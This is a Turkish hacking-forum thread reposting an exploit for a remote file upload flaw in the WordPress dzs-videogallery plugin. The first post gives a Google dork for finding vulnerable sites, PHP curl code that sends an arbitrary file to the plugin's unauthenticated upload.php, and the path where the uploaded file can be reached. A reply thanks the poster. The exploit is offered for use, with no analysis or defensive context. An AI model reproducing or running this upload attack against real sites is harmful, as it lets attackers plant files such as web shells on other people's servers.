Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,314 / 1,314
Deneyim: 59 / 100
Rep Sayısı: 138
Mesaj Sayısı: 5581
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
20.01.2014 09:16
Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on :
Windows/Linux

Exploits
PHP Kod:
< ? p h p $uploadfile="; $ch = curl_init(“http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘file_field’=>”@$uploadfile”));
curl_setopt(
$ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
print “
$postResult”;
?>


uploaded file:
Kod:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html


#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,055 / 1,055
Deneyim: 23 / 100
Rep Sayısı: 1071
Mesaj Sayısı: 3038
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
20.01.2014 11:58
eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.



1 Ziyaretçi